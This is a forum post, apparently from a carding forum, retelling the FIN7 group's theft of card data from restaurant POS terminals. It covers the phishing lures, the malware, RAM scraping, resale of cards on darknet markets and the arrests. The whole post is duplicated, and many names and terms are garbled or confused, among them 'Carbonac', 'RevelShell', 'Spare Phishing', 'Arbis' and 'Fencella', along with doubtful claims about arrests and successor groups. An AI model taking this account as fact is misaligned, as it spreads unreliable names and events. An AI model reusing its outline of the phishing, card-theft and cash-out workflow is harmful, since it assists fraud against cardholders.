Mutt
Professional
- Messages
- 1,199
- Reaction score
- 853
- Points
- 113
How carders stole 15 million credit cards from restaurants.
This topic is a shocking story of one of the most dangerous carding groups in the world: Fin7. How did they manage to hack restaurants, cafes, and steal 15 million bank cards around the world? Who is behind the attack? Why did even McDonald's and Chili's come under attack? And how did the FBI get on the trail of the criminals?
We examined:
- Methods of hacking POS terminals
- How hackers disguised themselves as an IT company
- Who led the operation
- Why Fin7 are still dangerous
Contents:
- Introduction: a common situation and unexpected consequences
- Who are Fin7
- The scale of the attacks and the affected networks
- 15 million cards and a billion in losses
- Spring 2015: The first signs of an attack
- Anomalies in POS terminals, a strange .doc file.
– A chain of companies with identical symptoms
– Malicious code analysis
– Stealth, encryption, updates
– FireEye and Trustwave begin investigation
– First lead: IP from Ukraine
– Communication with remote server. Surveillance begins.
– Mechanics of attacks: advanced phishing
– Letters from HR, accounting, tenders
– Mass, precision, project-like management
– February 2017: Leak from Arby's and the emergence of the name Fin7
– 355,000 cards
– FIN7 is an internal name from analysts
– Dmitry Fedorov (Aqua): a key figure
– Coordination, management, training of employees
– Combi Security: cover by a legitimate company
– Website, vacancies, recruitment of developers via LinkedIn
– Developers did not know that they were working for hackers
– Fin7 as an IT startup
– Roles: developers, marketers, engineers, managers
– Distribution of tasks and reporting
– Tools and disguise
– Karbanak, Bateler, PowerShell, PDF, JPEG
– Encryption, bypassing antiviruses
– Why the scheme worked
– The weak link is a person
– Good English, plausible letters
– Example of an attack: infection via Word document
– Spear Phishing, company research
– Macros, exploits, software installation
– What was stolen and where was it transferred
– Name, number, expiration date, CVV
– Fin7 storages
– Scale of damage
– 100+ companies, 6,500 terminals, $1 billion in losses
– Sale of cards on the darknet $10–50 per card, cashing out, equipment, online shopping
– Concealment methods
– TOR, proxy, VPN, self-destruction, variable code
– Puncture #1: Ukrainian IP and associated domains
– Operator error. Associated templates, administrator's e-mail.
– Puncture #2: Correspondence leak
– Salaries, IP, Excel with maps — evidence for the FBI
– Others arrested — Bogachev, Kolpakov, freelancers
– Cooperation with the investigation
– Consequences
— 10+ arrests, server seizure
– Fin7 as a structure disappears, members — in other groups
You go to McDonald's after work, buy yourself something to eat and pay with a card. A week later, your bank blocks the card. Someone just bought a laptop with your money.
Meet the Fin7 group. They are associated with Ukraine because of their IP addresses, but citizens of other countries, such as Russia, could also be part of the group. The nationality of all participants is not confirmed. They created shell companies, hired developers through LinkedIn.
And they collected tens of thousands of what we all have at hand. Credit cards. At the peak of their activity, they had access to thousands of POS terminals across America. They had their own accounting department and even an HR department. They acted like an IT company, but worked like the mafia. In total, over 15 million cards. Damages exceeding one billion dollars. And all this without a single bank hack.
Only restaurants, only phishing. Spring 2015. The IT department of one US restaurant chain sounded the alarm. POS terminals began to behave strangely. Transactions were delayed, unknown processes appeared, the system suddenly rebooted. For no reason. The security service finds a strange file in one of the systems. It seems to be an ordinary doc, but opening this document activates malicious code.
An internal investigation begins. And a few weeks later, another company reports a similar anomaly. And then another. And another. Chipotle. Delly. Jason. Red Robin. Customers of these chains began to complain en masse about fraudulent write-offs from their cards after an ordinary dinner or lunch. What did the experts see? The code infecting the POS system was sophisticated. It knew how to hide, encrypted traffic, and was regularly updated.
That's when FireEye researchers began to suspect that they were dealing with more than just one carder, but a group with huge resources. The first clue was a tag in the code. They found a clue in one of the samples. The malware contacted a remote server, the IP of which it entered as being in Ukraine. This was the first clue indicating the source of the attack. It would seem that it was just a phishing attack. The mechanics were banal. The victim received an email with an attachment, supposedly from the accounting department, or HR, or about a tender.
The file opened and infected the system. But the scale and stability of the attacks were alarming. The same malware appeared in dozens of companies. The senders of the emails were perfectly disguised as patriarchal partners or contractors. The attacks came in series, as if on schedule. Someone conducted the attacks as a project, someone distributed tasks, set deadlines and checked the results. The final point is Arbis. February 2017.
The Arbis restaurant chain officially reports that the leak compromised the data of 355 thousand customers. After this incident, the investigation is named "Fin7". This is the internal designation of the group from analysts. "Fin" stands for "financial threats". "7" is the seventh investigation by the company. This name will be assigned to the group in the media and intelligence reports. But then no one knew how deep their roots were.
Already in 2018, the FBI identifies one of the key coordinators. Dmitry Fedorovich is a citizen of Ukraine. In some documents, he appears as "AQUA" - a carder pseudonym. He did not just write code. He managed the structure, coordinated attacks, trained personnel, monitored the quality of task execution. The most interesting thing is that Fin7 operated under the cover of a white company. They created a combi-security company, supposedly a legal provider of IT services. Website, mail, vacancies.
Developers were hired remotely through LinkedIn, Freelance and Upwork. They were asked to write scripts without explaining that these scripts were part of phishing attacks. Many employees did not even know that they were working for a carding group. FinSeven was similar to startups. Developers created phishing documents, adapting to the goals. Marketers prepared mailings on behalf of the accounting department, HR department and even government agencies. Engineers tested the virus in a sandbox before launching it into the real network.
Managers tracked progress on goals, reminded about deadlines and compiled reports. Everyone had their own area of responsibility. Debugging and adaptation. Fin7 constantly upgraded their tools. One of the most famous is Carbanak, and later - its own forks for the needs of POS. They disguised malware as word documents, PDF, even JPEG, used legal Windows tools, PowerShell to hide activity, implemented antivirus bypasses and encrypted traffic for invisibility.
When infection occurred, live operators were involved in the case. They established connections via RevelShell, a method by which a hacker or program can gain remote access to a victim's computer. They installed additional utilities, started searching for the necessary files, in particular, databases with card numbers. Sometimes the infection lasted for days and weeks, and they were in no hurry.
The main thing was to remain unnoticed. Why did it work? Fin7 knew that the weakest link in any system is a person. They used social engineering, fake letters, good English and literate letter structure, mass. They could send out thousands of infected letters at a time. Imagine you manage a chain of restaurants. You have dozens of terminals, POS systems connected to a local network.
And one day, one of the employees opens the letter "Invoice for the delivery of vegetables. Urgent payment." The attachment is a Word document. It opens, and nothing happens. At first glance. But at this point, a virus is already living inside the system. Small, almost invisible, like a spy. The main method is Spare Phishing, i.e. a targeted attack. Fin7 did not just send spam, they studied the target, the company name, the last names, first names and patronymics of employees, partners and suppliers, the style of internal correspondence.
The letters came from realistic senders. People opened such letters without thinking. After opening the document, a script was activated, for example, through malicious Word macros or Windows vulnerabilities. One of the Fin7 tools was installed. Battler is a spyware written in PowerShell. Carbonac is a universal rad, remote access. Additional plugins, keyloggers, password dumpers, sniffers - all this allowed Fin7 to gain full control over the infected machine.
The main target is post-terminals, that is, what clients’ bank cards go through. Fin7 got into the local network, scanned where the post-modules were, installed a RAM scraper there, a program that reads data from the card in real time, directly from RAM. Why from memory? Because even encrypted card data temporarily goes into open RAM during a transaction.
And this window is what Fin7 used. What did they steal? Card name, owner’s name, card number, expiration date – CVV, if there was access, location and name of the restaurant. This data flowed into centralized storages, which Fin7 carefully disguised.
According to Dodge reports, more than a hundred companies suffered, six and a half thousand POS terminals were infected, more than fifteen million cards were stolen, losses of companies and banks exceeded one billion dollars, and all this over three years in the background, without shootings, hacks and robberies. Then another part of Fin7 – partners from the Darknet – kicked in. The cards were sold on forums like Joker Stash and CarderPlanet. The average price was from $10 to $50 per card, depending on the type and balance. They were bought by cash-out operators. The cards were used to buy equipment and resell it, withdraw cash, order from online stores, especially in countries with poor anti-fraud systems.
Fin7 skillfully hid their actions. They used Tor, proxy and VPN, installed self-destruct timers in malware. The program code was constantly changing so that antiviruses did not have time to adapt. The entire operation could last a week, and the victim did not notice anything. This was not an attack, it was an occupation.
Fin7 were sure they were elusive. Protected by VPNs, fake companies, and the anonymity of the Darknet. But, as it usually happens, they made mistakes. Puncture number one — duplicate IPs and domains. Fin7 carefully disguised themselves. But in one of the attacks, the operator did not change the proxy, and the IP turned out to be Ukrainian, with access to the malware control panel. Later, related domains were found, registered to fictitious persons, but with the same templates.
One of the servers was hosted in the USA, and they reached the administrator's email through it. Puncture number two. Correspondence leak. One of the FireEye analysts gained access to FinSeven's internal correspondence, where developers' salaries, status and tasks, IPs, addresses and passwords, and even files with the obtained cards were discussed. This array became key evidence for the FBI.
In 2018, Dmitry Fedorovich, AQUA, the very same FinSeven coordinator and project manager, was detained in Spain. His arrest is the result of an operation by the FBI and Europol. Fedorovich was extradited to the United States. During interrogations, he did not admit guilt, but the investigation already had tens of gigabytes of evidence. Soon, Fedor Bogachev, not to be confused with the author of "Zeus", a namesake, an IT specialist who made scripts for Battle.Air, was arrested. Andrey Kolpakov, a technical leader, managed several groups in combo security.
Several Ukrainian freelancers hired through Upwork, they did not even suspect that they were writing malware. Some FinSeven members cooperated with the investigation in exchange for a mitigated sentence. Subsequently, a total of more than ten key participants were arrested. FinSeven partially ceased to exist as an organization, but some of its members later surfaced in other groups - Revel, DarkSide, BlackBuster.
The Ukrainian cybersecurity special service officially participated in the operation. There were searches and interrogations within the country. In 2022, it was noticed that a group with a similar structure again began phishing attacks on restaurants and hotels in the United States. Their tools resembled painfully familiar macros – lateral movement Trojan methods. In simple terms, it’s as if a thief broke into one house in a neighborhood and then began looking for ways to sneak into neighboring houses, using, for example, common fences or windows.
In the case of computers, a hacker or carder can use stolen passwords, software vulnerabilities, or internal network connections to get to more important targets. Experts have suggested that this could be a reincarnation of Fencella or the work of its former members.
This topic is a shocking story of one of the most dangerous carding groups in the world: Fin7. How did they manage to hack restaurants, cafes, and steal 15 million bank cards around the world? Who is behind the attack? Why did even McDonald's and Chili's come under attack? And how did the FBI get on the trail of the criminals?
We examined:
- Methods of hacking POS terminals
- How hackers disguised themselves as an IT company
- Who led the operation
- Why Fin7 are still dangerous
Contents:
- Introduction: a common situation and unexpected consequences
- Who are Fin7
- The scale of the attacks and the affected networks
- 15 million cards and a billion in losses
- Spring 2015: The first signs of an attack
- Anomalies in POS terminals, a strange .doc file.
– A chain of companies with identical symptoms
– Malicious code analysis
– Stealth, encryption, updates
– FireEye and Trustwave begin investigation
– First lead: IP from Ukraine
– Communication with remote server. Surveillance begins.
– Mechanics of attacks: advanced phishing
– Letters from HR, accounting, tenders
– Mass, precision, project-like management
– February 2017: Leak from Arby's and the emergence of the name Fin7
– 355,000 cards
– FIN7 is an internal name from analysts
– Dmitry Fedorov (Aqua): a key figure
– Coordination, management, training of employees
– Combi Security: cover by a legitimate company
– Website, vacancies, recruitment of developers via LinkedIn
– Developers did not know that they were working for hackers
– Fin7 as an IT startup
– Roles: developers, marketers, engineers, managers
– Distribution of tasks and reporting
– Tools and disguise
– Karbanak, Bateler, PowerShell, PDF, JPEG
– Encryption, bypassing antiviruses
– Why the scheme worked
– The weak link is a person
– Good English, plausible letters
– Example of an attack: infection via Word document
– Spear Phishing, company research
– Macros, exploits, software installation
– What was stolen and where was it transferred
– Name, number, expiration date, CVV
– Fin7 storages
– Scale of damage
– 100+ companies, 6,500 terminals, $1 billion in losses
– Sale of cards on the darknet $10–50 per card, cashing out, equipment, online shopping
– Concealment methods
– TOR, proxy, VPN, self-destruction, variable code
– Puncture #1: Ukrainian IP and associated domains
– Operator error. Associated templates, administrator's e-mail.
– Puncture #2: Correspondence leak
– Salaries, IP, Excel with maps — evidence for the FBI
– Others arrested — Bogachev, Kolpakov, freelancers
– Cooperation with the investigation
– Consequences
— 10+ arrests, server seizure
– Fin7 as a structure disappears, members — in other groups
You go to McDonald's after work, buy yourself something to eat and pay with a card. A week later, your bank blocks the card. Someone just bought a laptop with your money.
Meet the Fin7 group. They are associated with Ukraine because of their IP addresses, but citizens of other countries, such as Russia, could also be part of the group. The nationality of all participants is not confirmed. They created shell companies, hired developers through LinkedIn.
And they collected tens of thousands of what we all have at hand. Credit cards. At the peak of their activity, they had access to thousands of POS terminals across America. They had their own accounting department and even an HR department. They acted like an IT company, but worked like the mafia. In total, over 15 million cards. Damages exceeding one billion dollars. And all this without a single bank hack.
Only restaurants, only phishing. Spring 2015. The IT department of one US restaurant chain sounded the alarm. POS terminals began to behave strangely. Transactions were delayed, unknown processes appeared, the system suddenly rebooted. For no reason. The security service finds a strange file in one of the systems. It seems to be an ordinary doc, but opening this document activates malicious code.
An internal investigation begins. And a few weeks later, another company reports a similar anomaly. And then another. And another. Chipotle. Delly. Jason. Red Robin. Customers of these chains began to complain en masse about fraudulent write-offs from their cards after an ordinary dinner or lunch. What did the experts see? The code infecting the POS system was sophisticated. It knew how to hide, encrypted traffic, and was regularly updated.
That's when FireEye researchers began to suspect that they were dealing with more than just one carder, but a group with huge resources. The first clue was a tag in the code. They found a clue in one of the samples. The malware contacted a remote server, the IP of which it entered as being in Ukraine. This was the first clue indicating the source of the attack. It would seem that it was just a phishing attack. The mechanics were banal. The victim received an email with an attachment, supposedly from the accounting department, or HR, or about a tender.
The file opened and infected the system. But the scale and stability of the attacks were alarming. The same malware appeared in dozens of companies. The senders of the emails were perfectly disguised as patriarchal partners or contractors. The attacks came in series, as if on schedule. Someone conducted the attacks as a project, someone distributed tasks, set deadlines and checked the results. The final point is Arbis. February 2017.
The Arbis restaurant chain officially reports that the leak compromised the data of 355 thousand customers. After this incident, the investigation is named "Fin7". This is the internal designation of the group from analysts. "Fin" stands for "financial threats". "7" is the seventh investigation by the company. This name will be assigned to the group in the media and intelligence reports. But then no one knew how deep their roots were.
Already in 2018, the FBI identifies one of the key coordinators. Dmitry Fedorovich is a citizen of Ukraine. In some documents, he appears as "AQUA" - a carder pseudonym. He did not just write code. He managed the structure, coordinated attacks, trained personnel, monitored the quality of task execution. The most interesting thing is that Fin7 operated under the cover of a white company. They created a combi-security company, supposedly a legal provider of IT services. Website, mail, vacancies.
Developers were hired remotely through LinkedIn, Freelance and Upwork. They were asked to write scripts without explaining that these scripts were part of phishing attacks. Many employees did not even know that they were working for a carding group. FinSeven was similar to startups. Developers created phishing documents, adapting to the goals. Marketers prepared mailings on behalf of the accounting department, HR department and even government agencies. Engineers tested the virus in a sandbox before launching it into the real network.
Managers tracked progress on goals, reminded about deadlines and compiled reports. Everyone had their own area of responsibility. Debugging and adaptation. Fin7 constantly upgraded their tools. One of the most famous is Carbanak, and later - its own forks for the needs of POS. They disguised malware as word documents, PDF, even JPEG, used legal Windows tools, PowerShell to hide activity, implemented antivirus bypasses and encrypted traffic for invisibility.
When infection occurred, live operators were involved in the case. They established connections via RevelShell, a method by which a hacker or program can gain remote access to a victim's computer. They installed additional utilities, started searching for the necessary files, in particular, databases with card numbers. Sometimes the infection lasted for days and weeks, and they were in no hurry.
The main thing was to remain unnoticed. Why did it work? Fin7 knew that the weakest link in any system is a person. They used social engineering, fake letters, good English and literate letter structure, mass. They could send out thousands of infected letters at a time. Imagine you manage a chain of restaurants. You have dozens of terminals, POS systems connected to a local network.
And one day, one of the employees opens the letter "Invoice for the delivery of vegetables. Urgent payment." The attachment is a Word document. It opens, and nothing happens. At first glance. But at this point, a virus is already living inside the system. Small, almost invisible, like a spy. The main method is Spare Phishing, i.e. a targeted attack. Fin7 did not just send spam, they studied the target, the company name, the last names, first names and patronymics of employees, partners and suppliers, the style of internal correspondence.
The letters came from realistic senders. People opened such letters without thinking. After opening the document, a script was activated, for example, through malicious Word macros or Windows vulnerabilities. One of the Fin7 tools was installed. Battler is a spyware written in PowerShell. Carbonac is a universal rad, remote access. Additional plugins, keyloggers, password dumpers, sniffers - all this allowed Fin7 to gain full control over the infected machine.
The main target is post-terminals, that is, what clients’ bank cards go through. Fin7 got into the local network, scanned where the post-modules were, installed a RAM scraper there, a program that reads data from the card in real time, directly from RAM. Why from memory? Because even encrypted card data temporarily goes into open RAM during a transaction.
And this window is what Fin7 used. What did they steal? Card name, owner’s name, card number, expiration date – CVV, if there was access, location and name of the restaurant. This data flowed into centralized storages, which Fin7 carefully disguised.
According to Dodge reports, more than a hundred companies suffered, six and a half thousand POS terminals were infected, more than fifteen million cards were stolen, losses of companies and banks exceeded one billion dollars, and all this over three years in the background, without shootings, hacks and robberies. Then another part of Fin7 – partners from the Darknet – kicked in. The cards were sold on forums like Joker Stash and CarderPlanet. The average price was from $10 to $50 per card, depending on the type and balance. They were bought by cash-out operators. The cards were used to buy equipment and resell it, withdraw cash, order from online stores, especially in countries with poor anti-fraud systems.
Fin7 skillfully hid their actions. They used Tor, proxy and VPN, installed self-destruct timers in malware. The program code was constantly changing so that antiviruses did not have time to adapt. The entire operation could last a week, and the victim did not notice anything. This was not an attack, it was an occupation.
Fin7 were sure they were elusive. Protected by VPNs, fake companies, and the anonymity of the Darknet. But, as it usually happens, they made mistakes. Puncture number one — duplicate IPs and domains. Fin7 carefully disguised themselves. But in one of the attacks, the operator did not change the proxy, and the IP turned out to be Ukrainian, with access to the malware control panel. Later, related domains were found, registered to fictitious persons, but with the same templates.
One of the servers was hosted in the USA, and they reached the administrator's email through it. Puncture number two. Correspondence leak. One of the FireEye analysts gained access to FinSeven's internal correspondence, where developers' salaries, status and tasks, IPs, addresses and passwords, and even files with the obtained cards were discussed. This array became key evidence for the FBI.
In 2018, Dmitry Fedorovich, AQUA, the very same FinSeven coordinator and project manager, was detained in Spain. His arrest is the result of an operation by the FBI and Europol. Fedorovich was extradited to the United States. During interrogations, he did not admit guilt, but the investigation already had tens of gigabytes of evidence. Soon, Fedor Bogachev, not to be confused with the author of "Zeus", a namesake, an IT specialist who made scripts for Battle.Air, was arrested. Andrey Kolpakov, a technical leader, managed several groups in combo security.
Several Ukrainian freelancers hired through Upwork, they did not even suspect that they were writing malware. Some FinSeven members cooperated with the investigation in exchange for a mitigated sentence. Subsequently, a total of more than ten key participants were arrested. FinSeven partially ceased to exist as an organization, but some of its members later surfaced in other groups - Revel, DarkSide, BlackBuster.
The Ukrainian cybersecurity special service officially participated in the operation. There were searches and interrogations within the country. In 2022, it was noticed that a group with a similar structure again began phishing attacks on restaurants and hotels in the United States. Their tools resembled painfully familiar macros – lateral movement Trojan methods. In simple terms, it’s as if a thief broke into one house in a neighborhood and then began looking for ways to sneak into neighboring houses, using, for example, common fences or windows.
In the case of computers, a hacker or carder can use stolen passwords, software vulnerabilities, or internal network connections to get to more important targets. Experts have suggested that this could be a reincarnation of Fencella or the work of its former members.
